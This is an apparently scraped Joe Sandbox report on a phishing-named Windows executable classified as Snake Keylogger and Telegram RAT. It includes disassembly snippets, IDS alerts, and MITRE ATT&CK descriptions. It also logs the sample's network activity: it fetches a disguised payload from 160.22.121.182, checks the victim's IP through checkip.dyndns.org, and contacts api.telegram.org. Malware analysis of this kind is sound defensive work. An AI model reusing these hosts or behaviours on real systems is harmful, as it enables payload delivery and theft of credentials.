Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05F20751h	3_2_05F204A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05F2E301h	3_2_05F2E058
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05F2DEA9h	3_2_05F2DC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05F2DA51h	3_2_05F2D7A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05F2D5F9h	3_2_05F2D350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05F2D1A1h	3_2_05F2CEF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05F2CD49h	3_2_05F2CAA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05F2FD11h	3_2_05F2FA68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05F2C8F1h	3_2_05F2C648
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05F2F8B9h	3_2_05F2F610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05F21A38h	3_2_05F21610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05F57C4Dh	3_2_05F57910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05F56049h	3_2_05F55DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05F55BF1h	3_2_05F55948
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05F50FF1h	3_2_05F50D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05F50B99h	3_2_05F508F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05F55799h	3_2_05F554F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05F57761h	3_2_05F574B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05F55341h	3_2_05F55098
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05F50741h	3_2_05F50498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05F57309h	3_2_05F57060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05F54EE9h	3_2_05F54C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05F502E9h	3_2_05F50040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	3_2_05F5F032
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05F56EB1h	3_2_05F56C08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05F54A91h	3_2_05F547E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05F56A59h	3_2_05F567B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05F54611h	3_2_05F54368
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05F564CBh	3_2_05F56220

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49870 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49852 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49864 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49926 -> 104.21.48.1:443

Source: global traffic	HTTP traffic detected: GET /STATO/Gihdpimpq.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: 160.22.121.182Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Input	Output
URL: email Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": [ "No headers provided to analyze", "Cannot make security assessment without header information", "Default to low risk score due to lack of evidence" ] }
Date: unknown

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe

Function 05CB1CE8 Relevance: 1.9, Strings: 1, Instructions: 613
COMMON

Function 05CB51E0 Relevance: 1.7, APIs: 1, Instructions: 211
nativeCOMMON

Function 05CB51E8 Relevance: 1.6, APIs: 1, Instructions: 63
nativeCOMMON

Function 05CB8D39 Relevance: 1.6, APIs: 1, Instructions: 57
nativethreadCOMMON

Function 05CB8D40 Relevance: 1.6, APIs: 1, Instructions: 54
nativethreadCOMMON

Function 05CB1CD8 Relevance: 1.4, Strings: 1, Instructions: 170
COMMON

Function 05CB5BE4 Relevance: 1.7, APIs: 1, Instructions: 203
processCOMMON

Function 05CB5BF0 Relevance: 1.7, APIs: 1, Instructions: 201
processCOMMON

Function 05CB8720 Relevance: 1.6, APIs: 1, Instructions: 72
injectionCOMMON

Function 05CB8728 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Function 05CB7F09 Relevance: 1.6, APIs: 1, Instructions: 66
threadCOMMON

Function 05CB7F10 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Function 05CB84A8 Relevance: 1.6, APIs: 1, Instructions: 56
memoryCOMMON

Function 05CB84B0 Relevance: 1.6, APIs: 1, Instructions: 53
memoryCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre